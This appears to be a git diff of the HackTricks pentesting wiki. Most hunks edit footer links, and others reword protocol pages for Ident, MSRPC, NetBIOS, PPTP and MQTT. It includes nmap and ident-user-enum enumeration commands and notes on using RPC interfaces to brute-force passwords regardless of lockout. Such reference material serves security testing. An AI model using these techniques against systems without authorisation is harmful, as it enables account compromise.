group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. @@ -361,7 +361,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ruby-applications-injection.md b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ruby-applications-injection.md index 448c99045..6e69bab27 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ruby-applications-injection.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ruby-applications-injection.md @@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. @@ -55,7 +55,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md index 47e9db013..a9e06b750 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md @@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. @@ -161,7 +161,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-dangerous-entitlements.md b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-dangerous-entitlements.md index 2b2ce0202..e369a9e33 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-dangerous-entitlements.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-dangerous-entitlements.md @@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. @@ -192,7 +192,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/macos-xattr-acls-extra-stuff.md b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/macos-xattr-acls-extra-stuff.md index ce05d613e..679476366 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/macos-xattr-acls-extra-stuff.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/macos-xattr-acls-extra-stuff.md @@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. @@ -202,7 +202,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md index 06de5abd9..0231befe5 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md @@ -470,7 +470,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sip.md b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sip.md index be06df343..469a2d737 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sip.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sip.md @@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. @@ -269,7 +269,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/network-services-pentesting/10000-network-data-management-protocol-ndmp.md b/network-services-pentesting/10000-network-data-management-protocol-ndmp.md index 4983f1a12..4c8445fbc 100644 --- a/network-services-pentesting/10000-network-data-management-protocol-ndmp.md +++ b/network-services-pentesting/10000-network-data-management-protocol-ndmp.md @@ -17,8 +17,9 @@ Other ways to support HackTricks: # **Protocol Information** -**NDMP**, or **Network Data Management Protocol**, is a protocol meant to transport data between network attached storage \([NAS](https://en.wikipedia.org/wiki/Network-attached_storage)\) devices and [backup](https://en.wikipedia.org/wiki/Backup) devices. This removes the need for transporting the data through the backup server itself, thus enhancing speed and removing load from the backup server. -From [Wikipedia](https://en.wikipedia.org/wiki/NDMP). +From [Wikipedia](https://en.wikipedia.org/wiki/NDMP): + +> **NDMP**, or **Network Data Management Protocol**, is a protocol meant to transport data between network attached storage \([NAS](https://en.wikipedia.org/wiki/Network-attached_storage)\) devices and [backup](https://en.wikipedia.org/wiki/Backup) devices. This removes the need for transporting the data through the backup server itself, thus enhancing speed and removing load from the backup server. **Default port:** 10000 diff --git a/network-services-pentesting/1099-pentesting-java-rmi.md b/network-services-pentesting/1099-pentesting-java-rmi.md index d1bdd7e59..3f309bee7 100644 --- a/network-services-pentesting/1099-pentesting-java-rmi.md +++ b/network-services-pentesting/1099-pentesting-java-rmi.md @@ -314,6 +314,9 @@ $ rmg known javax.management.remote.rmi.RMIServerImpl_Stub * [rmiscout](https://github.com/BishopFox/rmiscout) * [BaRMIe](https://github.com/NickstaDB/BaRMIe) +## References +* [https://github.com/qtc-de/remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) + ## HackTricks Automatic Commands ``` diff --git a/network-services-pentesting/113-pentesting-ident.md b/network-services-pentesting/113-pentesting-ident.md index a6243cfdb..9b39d23f3 100644 --- a/network-services-pentesting/113-pentesting-ident.md +++ b/network-services-pentesting/113-pentesting-ident.md @@ -23,7 +23,9 @@ Get Access Today: ## Basic Information -Is an [Internet](https://en.wikipedia.org/wiki/Internet) [protocol](https://en.wikipedia.org/wiki/Protocol\_\(computing\)) that helps identify the user of a particular [TCP](https://en.wikipedia.org/wiki/Transmission\_Control\_Protocol) connection. +The **Ident Protocol** is used over the **Internet** to associate a **TCP connection** with a specific user. Originally designed to aid in **network management** and **security**, it operates by allowing a server to query a client on port 113 to request information about the user of a particular TCP connection. + +However, due to modern privacy concerns and the potential for misuse, its usage has decreased as it can inadvertently reveal user information to unauthorized parties. Enhanced security measures, such as encrypted connections and strict access controls, are recommended to mitigate these risks. **Default port:** 113 @@ -50,7 +52,7 @@ Other errors: ### Nmap -By default (-sC) nmap will identify every user of every running port: +By default (`-sC``) nmap will identify every user of every running port: ``` PORT STATE SERVICE VERSION @@ -69,7 +71,7 @@ PORT STATE SERVICE VERSION ### Ident-user-enum -Ident-user-enum is a simple PERL script to query the ident service (113/TCP) in order to determine the owner of the process listening on each TCP port of a target system. The list of usernames gathered can be used for password guessing attacks on other network services. It can be installed with `apt install ident-user-enum`. +[**Ident-user-enum**](https://github.com/pentestmonkey/ident-user-enum) is a simple PERL script to query the ident service (113/TCP) in order to determine the owner of the process listening on each TCP port of a target system. The list of usernames gathered can be used for password guessing attacks on other network services. It can be installed with `apt install ident-user-enum`. ``` root@kali:/opt/local/recon/192.168.1.100# ident-user-enum 192.168.1.100 22 113 139 445 @@ -107,7 +109,7 @@ Entry_1: Name: Notes Description: Notes for Ident Note: | - Is an Internet protocol that helps identify the user of a particular TCP connection. + The Ident Protocol is used over the Internet to associate a TCP connection with a specific user. Originally designed to aid in network management and security, it operates by allowing a server to query a client on port 113 to request information about the user of a particular TCP connection. https://book.hacktricks.xyz/pentesting/113-pentesting-ident diff --git a/network-services-pentesting/135-pentesting-msrpc.md b/network-services-pentesting/135-pentesting-msrpc.md index 60a4c8a35..91c476adf 100644 --- a/network-services-pentesting/135-pentesting-msrpc.md +++ b/network-services-pentesting/135-pentesting-msrpc.md @@ -72,37 +72,44 @@ All options except `tcp_dcerpc_auditor` are specifically designed for targeting #### Notable RPC interfaces -**IFID**: 12345778-1234-abcd-ef00-0123456789ab -**Named Pipe**: \pipe\lsarpc -**Description**: LSA interface, used to enumerate users. +* **IFID**: 12345778-1234-abcd-ef00-0123456789ab +* **Named Pipe**: `\pipe\lsarpc` +* **Description**: LSA interface, used to enumerate users. -**IFID**: 3919286a-b10c-11d0-9ba8-00c04fd92ef5 -**Named Pipe**: \pipe\lsarpc -**Description**: LSA Directory Services (DS) interface, used to enumerate domains and trust relationships. -**IFID**: 12345778-1234-abcd-ef00-0123456789ac -**Named Pipe**: \pipe\samr -**Description**: LSA SAMR interface, used to access public SAM database elements (e.g., usernames) and brute-force user passwords regardless of account lockout policy. +* **IFID**: 3919286a-b10c-11d0-9ba8-00c04fd92ef5 +* **Named Pipe**: `\pipe\lsarpc` +* **Description**: LSA Directory Services (DS) interface, used to enumerate domains and trust relationships. -**IFID**: 1ff70682-0a51-30e8-076d-740be8cee98b -**Named Pipe**: \pipe\atsvc -**Description**: Task scheduler, used to remotely execute commands. -**IFID**: 338cd001-2244-31f1-aaaa-900038001003 -**Named Pipe**: \pipe\winreg -**Description**: Remote registry service, used to access and modify the system registry. +* **IFID**: 12345778-1234-abcd-ef00-0123456789ac +* **Named Pipe**: `\pipe\samr` +* **Description**: LSA SAMR interface, used to access public SAM database elements (e.g., usernames) and brute-force user passwords regardless of account lockout policy. -**IFID**: 367abb81-9844-35f1-ad32-98f038001003 -**Named Pipe**: \pipe\svcctl -**Description**: Service control manager and server services, used to remotely start and stop services and execute commands. -**IFID**: 4b324fc8-1670-01d3-1278-5a47bf6ee188 -**Named Pipe**: \pipe\srvsvc -**Description**: Service control manager and server services, used to remotely start and stop services and execute commands. +* **IFID**: 1ff70682-0a51-30e8-076d-740be8cee98b +* **Named Pipe**: `\pipe\atsvc` +* **Description**: Task scheduler, used to remotely execute commands. -**IFID**: 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57 -**Named Pipe**: \pipe\epmapper -**Description**: DCOM interface, used for brute-force password grinding and information gathering via WM. + +* **IFID**: 338cd001-2244-31f1-aaaa-900038001003 +* **Named Pipe**: `\pipe\winreg` +* **Description**: Remote registry service, used to access and modify the system registry. + + +* **IFID**: 367abb81-9844-35f1-ad32-98f038001003 +* **Named Pipe**: `\pipe\svcctl` +* **Description**: Service control manager and server services, used to remotely start and stop services and execute commands. + + +* **IFID**: 4b324fc8-1670-01d3-1278-5a47bf6ee188 +* **Named Pipe**: `\pipe\srvsvc` +* **Description**: Service control manager and server services, used to remotely start and stop services and execute commands. + + +* **IFID**: 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57 +* **Named Pipe**: `\pipe\epmapper` +* **Description**: DCOM interface, used for brute-force password grinding and information gathering via WM. ### Identifying IP addresses @@ -110,7 +117,6 @@ Using [https://github.com/mubix/IOXIDResolver](https://github.com/mubix/IOXIDRes This method has been used to get interface information as **IPv6** address from the HTB box _APT_. See [here](https://0xdf.gitlab.io/2021/04/10/htb-apt.html) for 0xdf APT writeup, it includes an alternative method using rpcmap.py from [Impacket](https://github.com/SecureAuthCorp/impacket/) with _stringbinding_ (see above). - ## Port 593 The **rpcdump.exe** from [rpctools](https://resources.oreilly.com/examples/9780596510305/tree/master/tools/rpctools) can interact with this port. diff --git a/network-services-pentesting/137-138-139-pentesting-netbios.md b/network-services-pentesting/137-138-139-pentesting-netbios.md index 65b805ebc..6b1877811 100644 --- a/network-services-pentesting/137-138-139-pentesting-netbios.md +++ b/network-services-pentesting/137-138-139-pentesting-netbios.md @@ -16,15 +16,17 @@ Other ways to support HackTricks: ## NetBios Name Service +**NetBIOS Name Service** plays a crucial role, involving various services such as **name registration and resolution**, **datagram distribution**, and **session services**, utilizing specific ports for each service. + +[From Wikidepia](https://en.wikipedia.org/wiki/NetBIOS_over_TCP/IP): + * Name service for name registration and resolution (ports: 137/udp and 137/tcp). * Datagram distribution service for connectionless communication (port: 138/udp). * Session service for connection-oriented communication (port: 139/tcp). ### Name Service -Every machine should have a name inside the NetBios network. To request a name, a machine should send a "Name Query" packet in broadcast and if anyone answer that it is already using that name, the machine can use that name. If there is a Name Service server, the computer could ask the Name Service server if someone is using the name that it wants to use. - -To discover the IP address of a Name, a PC has to send a "Name Query" packet and wait if anyone answers. If there is a Name Service server, the PC can ask it for the IP of the name. +For a device to participate in a NetBIOS network, it must have a unique name. This is achieved through a **broadcast process** where a "Name Query" packet is sent. If no objections are received, the name is considered available. Alternatively, a **Name Service server** can be queried directly to check for name availability or to resolve a name to an IP address. Tools like `nmblookup`, `nbtscan`, and `nmap` are utilized for enumerating NetBIOS services, revealing server names and MAC addresses. ```bash PORT STATE SERVICE VERSION @@ -41,7 +43,7 @@ sudo nmap -sU -sV -T4 --script nbstat.nse -p137 -Pn -n ### Datagram Distribution Service -NetBIOS datagrams are sent over UDP. A datagram is sent with a "Direct Unique" or "Direct Group" packet if it's being sent to a particular NetBIOS name, or a "Broadcast" packet if it's being sent to all NetBIOS names on the network. +NetBIOS datagrams allow for connectionless communication via UDP, supporting direct messaging or broadcasting to all network names. This service uses port **138/udp**. ```bash PORT STATE SERVICE VERSION @@ -50,15 +52,11 @@ PORT STATE SERVICE VERSION ### Session Service -Session mode lets two computers establish a connection for a "conversation", allows larger messages to be handled, and provides error detection and recovery. +For connection-oriented interactions, the **Session Service** facilitates a conversation between two devices, leveraging **TCP** connections through port **139/tcp**. A session begins with a "Session Request" packet and can be established based on the response. The service supports larger messages, error detection, and recovery, with TCP handling flow control and packet retransmission. -Sessions are established by exchanging packets. The computer establishing the session attempts to make a [TCP](https://en.wikipedia.org/wiki/Transmission\_Control\_Protocol) connection to port 139 on the computer with which the session is to be established. If the connection is made, the computer establishing the session then sends over the connection a "Session Request" packet with the NetBIOS names of the application establishing the session and the NetBIOS name to which the session is to be established. The computer with which the session is to be established will respond with a "Positive Session Response" indicating that a session can be established or a "Negative Session Response" indicating that no session can be established (either because that computer isn't listening for sessions being established to that name or because no resources are available to establish a session to that name). +Data transmission within a session involves **Session Message packets**, with sessions being terminated by closing the TCP connection. -Data is transmitted during an established session by Session Message packets. - -TCP handles flow control and retransmission of all session service packets, and the dividing of the data stream over which the packets are transmitted into [IP](https://en.wikipedia.org/wiki/Internet\_Protocol) datagrams small enough to fit in link-layer packets. - -Sessions are closed by closing the TCP connection. +These services are integral to **NetBIOS** functionality, enabling efficient communication and resource sharing across a network. For more information on TCP and IP protocols, refer to their respective [TCP Wikipedia](https://en.wikipedia.org/wiki/Transmission_Control_Protocol) and [IP Wikipedia](https://en.wikipedia.org/wiki/Internet_Protocol) pages. ```bash PORT STATE SERVICE VERSION @@ -86,7 +84,7 @@ Entry_1: Datagram distribution service for connectionless communication (port: 138/udp). Session service for connection-oriented communication (port: 139/tcp). - Every machine should have a name inside the NetBios network. To request a name, a machine should send a "Name Query" packet in broadcast and if anyone answer that it is already using that name, the machine can use that name. If there is a Name Service server, the computer could ask the Name Service server if someone is using the name that it wants to use. + For a device to participate in a NetBIOS network, it must have a unique name. This is achieved through a broadcast process where a "Name Query" packet is sent. If no objections are received, the name is considered available. Alternatively, a Name Service server can be queried directly to check for name availability or to resolve a name to an IP address. https://book.hacktricks.xyz/pentesting/137-138-139-pentesting-netbios diff --git a/network-services-pentesting/1723-pentesting-pptp.md b/network-services-pentesting/1723-pentesting-pptp.md index 30c91c303..b38b09666 100644 --- a/network-services-pentesting/1723-pentesting-pptp.md +++ b/network-services-pentesting/1723-pentesting-pptp.md @@ -16,7 +16,7 @@ Other ways to support HackTricks: ## Basic Information -Commonly used to provide remote access to mobile devices, Point-to-Point Tunneling Protocol (PPTP) uses TCP port 1723 for key exchange and IP protocol 47 (GRE) to encrypt data between peers. +**Point-to-Point Tunneling Protocol (PPTP)** is a method widely employed for **remote access** to mobile devices. It utilizes **TCP port 1723** for the exchange of keys, while **IP protocol 47** (Generic Routing Encapsulation, or **GRE**), is used to encrypt the data that is transmitted between peers. This setup is crucial for establishing a secure communication channel over the internet, ensuring that the data exchanged remains confidential and protected from unauthorized access. **Default Port**:1723 @@ -29,10 +29,8 @@ nmap –Pn -sSV -p1723 ### [Brute Force](../generic-methodologies-and-resources/brute-force.md#pptp) ## Vulnerabilities - -{% embed url="https://www.schneier.com/academic/pptp/" %} - -{% embed url="https://github.com/moxie0/chapcrack" %} +* [https://www.schneier.com/academic/pptp/](https://www.schneier.com/academic/pptp/) +* [https://github.com/moxie0/chapcrack](https://github.com/moxie0/chapcrack)
diff --git a/network-services-pentesting/1883-pentesting-mqtt-mosquitto.md b/network-services-pentesting/1883-pentesting-mqtt-mosquitto.md index ef21f3b3a..f651c75f4 100644 --- a/network-services-pentesting/1883-pentesting-mqtt-mosquitto.md +++ b/network-services-pentesting/1883-pentesting-mqtt-mosquitto.md @@ -16,7 +16,7 @@ Other ways to support HackTricks: ## Basic Information -MQTT stands for MQ Telemetry Transport. It is a publish/subscribe, **extremely simple and lightweight messaging protocol**, designed for constrained devices and low-bandwidth, high-latency or unreliable networks. The design principles are to minimise network bandwidth and device resource requirements whilst also attempting to ensure reliability and some degree of assurance of delivery. These principles also turn out to make the protocol ideal of the emerging “machine-to-machine” (M2M) or “Internet of Things” world of connected devices, and for mobile applications where bandwidth and battery power are at a premium. +**MQ Telemetry Transport (MQTT)** is known as a **publish/subscribe messaging protocol** that stands out for its extreme simplicity and lightness. This protocol is specifically tailored for environments where devices have limited capabilities and operate over networks that are characterized by low bandwidth, high latency, or unreliable connections. The core objectives of MQTT include minimizing the usage of network bandwidth and reducing the demand on device resources. Additionally, it aims to maintain reliable communication and provide a certain level of delivery assurance. These goals make MQTT exceptionally suitable for the burgeoning field of **machine-to-machine (M2M) communication** and the **Internet of Things (IoT)**, where it's essential to connect a myriad of devices efficiently. Moreover, MQTT is highly beneficial for mobile applications, where conserving bandwidth and battery life is crucial. **Default port:** 1883 @@ -27,7 +27,16 @@ PORT STATE SERVICE REASON ## Inspecting the traffic -MQTT brokers send a **CONNACK** packet in **response** to a CONNECT packet. The **return code 0x00** indicates the credentials are valid and the return code **0x05 indicates they aren't. 0x05 example:** +hen a **CONNECT** packet is received by MQTT brokers, a **CONNACK** packet is sent back. This packet contains a return code which is crucial for understanding the connection status. A return code of **0x00** means that the credentials have been accepted, signifying a successful connection. On the other hand, a return code of **0x05** signals that the credentials are invalid, thus preventing the connection. + +For instance, if the broker rejects the connection due to invalid credentials, the scenario would look something like this: + +``` +{ + "returnCode": "0x05", + "description": "Connection Refused, not authorized" +} +``` ![](<../.gitbook/assets/image (645) (1).png>) @@ -98,17 +107,30 @@ The publish/subscribe model is composed of: * **Broker**: routes all the messages from the publishers to the subscribers. * **Topic**: consists of one or more levels that are separated by a a forward slash (e.g., /smartshouse/livingroom/temperature). -![](https://miro.medium.com/max/1073/1\*sIxvchdgHSqAGebJjFHBAg.png) - ### Packet Format Every MQTT packet contains a fixed header (Figure 02).Figure 02: Fixed Header 